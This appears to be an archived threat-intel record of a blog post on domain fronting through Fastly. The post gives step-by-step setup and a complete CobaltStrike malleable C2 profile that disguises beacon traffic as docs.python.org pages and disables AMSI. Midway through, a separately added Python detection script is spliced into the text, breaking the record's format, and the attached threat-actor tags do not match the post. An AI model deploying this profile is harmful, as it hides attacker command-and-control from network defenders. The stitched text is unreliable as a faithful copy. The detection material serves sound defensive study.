{
	"id": "5190edf9-2408-4976-ac1b-80dde0bf488a",
	"created_at": "2026-04-06T00:22:20.514225Z",
	"updated_at": "2026-04-10T13:13:03.057294Z",
	"deleted_at": null,
	"sha1_hash": "84e3683bde752083d9f94d725881d0bfb355cef8",
	"title": "Threat Spotlight - Domain Fronting",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 447582,
	"plain_text": "Threat Spotlight - Domain Fronting\r\nBy Still Hsu\r\nPublished: 2021-11-12 · Archived: 2026-04-02 11:35:30 UTC\r\nDomain fronting is a common technique that is sometimes used by threat actors to disguise their traffic as the real\r\ndeal. Essentially, what it is is communicate with legitimate-looking domains when reality, the traffic is being\r\npointed to threat actor’s C2 stations. A common example would be using legitimate or reputable domains with a\r\ncustom Host header to redirect the traffic to threat actor’s stations. There are many examples out there that abuse\r\nservices like Cloudflare, CloudFront, and such.\r\nIn today’s example, we’ll be using Fastly as an example. Fastly provides a service that’s more or less intended to\r\nact as a CDN, where you can create a service and tie it to your backend. As you can imagine, a company as large\r\nas Fastly (that was able to bring half the Internet with it when it went down), there are probably more than\r\nthousands of people using their services - and indeed there are.\r\nYou can do a quick search using services like RiskIQ to look through all of the subdomains associated with\r\n*.fastly.net . While it appears we’re not the first to discover this, there aren’t a whole lot of other resources out\r\nthere talking about abusing Fastly as a service.\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 1 of 7\n\nAnd Python Software Foundation just so happens to use it too!\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 2 of 7\n\nWhat actually happens is when you contact python.org , it actually gets interpreted as\r\npython.org.prod.global.fastly.net internally based on the Host header. 
This was actually brought to our attention a while back when my colleagues discovered CobaltStrike beacons in the wild that appeared to connect to Python-related domains on execution; upon further investigation, we realized they were abusing the nature of Fastly services to disguise their traffic. So I decided to do a little experiment this weekend to see whether I could recreate it myself.\r\nTo get started, I created a new service on Fastly called dl-python.org, a service name (and in turn a domain name) that appears similar enough to the real deal but doesn't actually exist (and it doesn't need to!).\r\nCreate a new service that appears genuine enough next to the target domain name; in this case, dl-python.org.\r\nNote that while dl-python.org appears to be owned by someone else, I don't actually have access to it, nor will the service ever make contact with that domain (we'll get to that part later). You can name it whatever you want.\r\nNext, in the Host settings section, enter your actual C2's domain name, something you have actual control over; in this case, my-c2domain.com. I have the port set to 55137, but ideally it should be 443 for HTTPS beacons. My ports 80/443 were occupied by something else when I was experimenting.\r\nNext, we're going to craft a new CobaltStrike stager. Create a new listener on your team server with the fronted domain name (docs.python.org, which sits behind Fastly) as the C2 host, and enter your Fastly service name (dl-python.org) in the Host header field. 
To make the traffic look a little more genuine, you can also craft your own malleable C2 profile with the contents of the Python docs inside. The profile I used follows; the HTML padding is left out.\r\nset sleeptime \"5000\";\r\nset jitter \"0\";\r\nset maxdns \"255\";\r\nset useragent \"Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0\";\r\n# set host_stage \"false\";\r\n\r\npost-ex {\r\n    # control the temporary process we spawn to\r\n    set spawnto_x86 \"%ProgramFiles(x86)%\\\\Everything\\\\Everything.exe\";\r\n    set spawnto_x64 \"%ProgramFiles%\\\\Mozilla Firefox\\\\firefox.exe\";\r\n    # change the permissions and content of our post-ex DLLs\r\n    set obfuscate \"true\";\r\n    # pass key function pointers from Beacon to its child jobs\r\n    set smartinject \"true\";\r\n    # disable AMSI in powerpick, execute-assembly, and psinject\r\n    set amsi_disable \"true\";\r\n}\r\n\r\nhttp-config {\r\n    set headers \"Date, Server, Content-Length, Keep-Alive, Connection, Content-Type\";\r\n    set trust_x_forwarded_for \"false\";\r\n    header \"Server\" \"nginx\";\r\n    header \"Keep-Alive\" \"timeout=5, max=100\";\r\n    header \"Connection\" \"Keep-Alive\";\r\n}\r\n\r\nhttp-get {\r\n    set uri \"/3/library/stdtypes.html\";\r\n    client {\r\n        header \"Accept\" \"*/*\";\r\n        # the Host header selects the Fastly service; DNS and TLS SNI still point at docs.python.org\r\n        header \"Host\" \"dl-python.org\";\r\n        metadata {\r\n            base64;\r\n            prepend \"session=\";\r\n            header \"Cookie\";\r\n        }\r\n    }\r\n    server {\r\n        header \"Server\" \"nginx\";\r\n        header \"Cache-Control\" \"max-age=0, no-cache\";\r\n        header \"Pragma\" \"no-cache\";\r\n        header \"Connection\" \"keep-alive\";\r\n        header \"Content-Type\" \"application/javascript; charset=utf-8\";\r\n        output {\r\n            # transforms run top to bottom: base64url first, then the append/prepend padding\r\n            base64url;\r\n            # the content was so long for my IDE that it actually hung when trying to parse it\r\n            # so I'm gonna leave this section to you\r\n            append \"...html_head...\";\r\n            prepend \"...html_body...\";\r\n            print;\r\n        }\r\n
    }\r\n}\r\n\r\nhttp-post {\r\n    set uri \"/3/library/struct.html\";\r\n    client {\r\n        header \"Accept\" \"*/*\";\r\n        header \"Host\" \"cobaltstrike.stillu.cc\";\r\n        id {\r\n            mask;\r\n            base64url;\r\n            parameter \"x-timer\";\r\n        }\r\n        output {\r\n            mask;\r\n            base64url;\r\n            parameter \"etag\";\r\n        }\r\n    }\r\n    server {\r\n        header \"Server\" \"nginx\";\r\n        header \"Cache-Control\" \"max-age=0, no-cache\";\r\n        header \"Pragma\" \"no-cache\";\r\n        header \"Connection\" \"keep-alive\";\r\n        header \"Content-Type\" \"application/javascript; charset=utf-8\";\r\n        output {\r\n            base64url;\r\n            append \"...html_head...\";\r\n            prepend \"...html_body...\";\r\n            print;\r\n        }\r\n    }\r\n}\r\nAnd that's it! Let's try to run the stager on our victim machine.\r\nAs you can see, it worked! It looks like it's contacting docs.python.org (and it is), yet the server returned beacon information for the stager - just not in plaintext, because I had the mask option enabled; otherwise the content would look almost like standard HTML with random bits of information thrown in because of the malleable C2 config above - and this is with unencrypted traffic.\r\nThis trick is perfect for threat actors who want to evade IT admins' attention:\r\n- it appears to contact a real domain with a benign URL (http://docs.python.org/3/library/stdtypes.html)\r\n- it can be made to communicate over HTTPS, so the Host header wouldn't even show up on the wire; only the TLS SNI (docs.python.org) and the front's certificate are visible unless the traffic is decrypted by an inspecting proxy\r\n- even if the IT admin does manage to figure out that the traffic goes to dl-python.org.prod.global.fastly.net, it still doesn't reveal the actual C2 address, as the resolved IP would just be Fastly's own CDN IP\r\nThis entire thing was really fun to recreate and helped me understand CobaltStrike a little more from an attacker's perspective, as I've always tackled CobaltStrike payloads from a Blue Team perspective as a threat intel researcher. 
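For the Blue Team side, as an added example that is not part of the original post: detection logic for the two things this setup leaves behind in logs. First, the SNI (docs.python.org) and the Host header (dl-python.org) disagree, which is only observable where a TLS-inspecting proxy records both; second, with sleeptime 5000 and jitter 0 the beacon calls back at a perfectly regular interval. The log format, field names, client IPs and the CDN range table below are constructed for the example; for real use, take the ranges from the provider's published IP list.

```python
# Added example (not from the original post): detection logic for the fronting pattern
# the post describes, run over constructed proxy log lines. It assumes a TLS-inspecting
# proxy that records both the SNI and the decrypted Host header; without inspection only
# the SNI (docs.python.org) is visible and the mismatch check cannot be made.
from datetime import datetime
import ipaddress
import statistics

# Constructed sample: two normal docs visits, plus a beacon that fronts through
# docs.python.org with Host: dl-python.org every 5 seconds (sleeptime 5000, jitter 0).
LOG_LINES = [
    'ts=2021-11-13T10:00:00Z src=10.0.0.7 dst=151.101.1.223 sni=docs.python.org host=docs.python.org uri=/3/library/struct.html',
    'ts=2021-11-13T10:00:01Z src=10.0.0.5 dst=151.101.1.223 sni=docs.python.org host=dl-python.org uri=/3/library/stdtypes.html',
    'ts=2021-11-13T10:00:06Z src=10.0.0.5 dst=151.101.1.223 sni=docs.python.org host=dl-python.org uri=/3/library/stdtypes.html',
    'ts=2021-11-13T10:00:11Z src=10.0.0.5 dst=151.101.1.223 sni=docs.python.org host=dl-python.org uri=/3/library/stdtypes.html',
    'ts=2021-11-13T10:00:16Z src=10.0.0.5 dst=151.101.1.223 sni=docs.python.org host=dl-python.org uri=/3/library/stdtypes.html',
    'ts=2021-11-13T10:00:40Z src=10.0.0.9 dst=151.101.1.223 sni=docs.python.org host=docs.python.org uri=/3/',
]

# Assumed CDN edge range used for enrichment; replace with the provider's published list.
CDN_RANGES = {'fastly': [ipaddress.ip_network('151.101.0.0/16')]}


def parse_line(line):
    # key=value tokens separated by spaces; values contain no spaces in this format.
    return dict(tok.split('=', 1) for tok in line.split())


def registered_domain(name):
    # Naive eTLD+1 (last two labels): fine for .org/.com, wrong for co.uk style suffixes.
    labels = name.lower().rstrip('.').split('.')
    return '.'.join(labels[-2:])


def cdn_provider(ip):
    addr = ipaddress.ip_address(ip)
    for name, nets in CDN_RANGES.items():
        if any(addr in net for net in nets):
            return name
    return None


def fronting_hits(records):
    # Core check: the TLS layer names one host, the HTTP layer another.
    hits = []
    for r in records:
        sni, host = r['sni'].lower(), r['host'].lower()
        if sni == host:
            continue
        hits.append({
            'src': r['src'], 'sni': sni, 'host': host,
            'cross_org': registered_domain(sni) != registered_domain(host),
            'cdn': cdn_provider(r['dst']),
        })
    return hits


def beacon_candidates(records, min_requests=4, max_cv=0.1):
    # Secondary signal: near-constant gap between requests per (src, host, uri),
    # which is what sleeptime 5000 with jitter 0 produces.
    by_key = {}
    for r in records:
        key = (r['src'], r['host'].lower(), r['uri'])
        ts = datetime.strptime(r['ts'], '%Y-%m-%dT%H:%M:%SZ')
        by_key.setdefault(key, []).append(ts)
    out = []
    for key, stamps in by_key.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0   # coefficient of variation
        if cv <= max_cv:
            out.append({'src': key[0], 'host': key[1], 'uri': key[2], 'interval_s': mean})
    return out


def analyze(lines):
    records = [parse_line(line) for line in lines]
    return {'fronting': fronting_hits(records), 'beacons': beacon_candidates(records)}


if __name__ == '__main__':
    for kind, items in analyze(LOG_LINES).items():
        for item in items:
            print(kind, item)
```

The SNI/Host mismatch is the high-confidence signal, and a hit whose two names belong to different registered domains (python.org versus dl-python.org) is worth an immediate look. The interval check on its own also fires on legitimate pollers, so use it to rank fronting hits rather than as a standalone alert. Where TLS is not inspected, the mismatch is invisible and the remaining signals are only the DNS/SNI name and the timing.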
If you are in the same position as me, I also encourage you to give CobaltStrike a try and attack your own machines to see what tricks you can pull off (if your organization has access to such a tool).\r\nSource: https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/"
	],
	"report_names": [
		"domain-fronting-fastly"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434940,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.pdf",
		"text": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.txt",
		"img": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.jpg"
	}
}